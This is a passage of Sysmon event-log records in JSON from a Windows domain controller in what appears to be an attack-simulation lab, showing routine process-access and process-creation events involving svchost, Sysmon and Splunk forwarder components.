{"EventTime":"2020-08-01 05:49:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3978,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:53.590\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:53.590","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3979,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:53.590\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:53.590","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3980,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:53.590\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0281-5F25-0000-0010F5F00500}\r\nTargetProcessId: 4052\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:53.590","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0281-5F25-0000-0010F5F00500}","TargetProcessId":"4052","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3981,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:53.731\r\nSourceProcessGUID: {A837DB8D-0281-5F25-0000-0010F5F00500}\r\nSourceProcessId: 4052\r\nSourceThreadId: 3932\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:53.731","SourceProcessGUID":"{A837DB8D-0281-5F25-0000-0010F5F00500}","SourceProcessId":"4052","SourceThreadId":"3932","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3982,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:54.170\r\nProcessGuid: {A837DB8D-0282-5F25-0000-0010B1F20500}\r\nProcessId: 3776\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:49:54.170","ProcessGuid":"{A837DB8D-0282-5F25-0000-0010B1F20500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:49:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3983,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:54.168\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0282-5F25-0000-0010B1F20500}\r\nTargetProcessId: 3776\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:54.168","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0282-5F25-0000-0010B1F20500}","TargetProcessId":"3776","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3984,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:54.168\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0282-5F25-0000-0010B1F20500}\r\nTargetProcessId: 3776\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:54.168","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0282-5F25-0000-0010B1F20500}","TargetProcessId":"3776","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:49:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3985,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:54.168\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:54.168","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3986,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:54.168\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:54.168","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 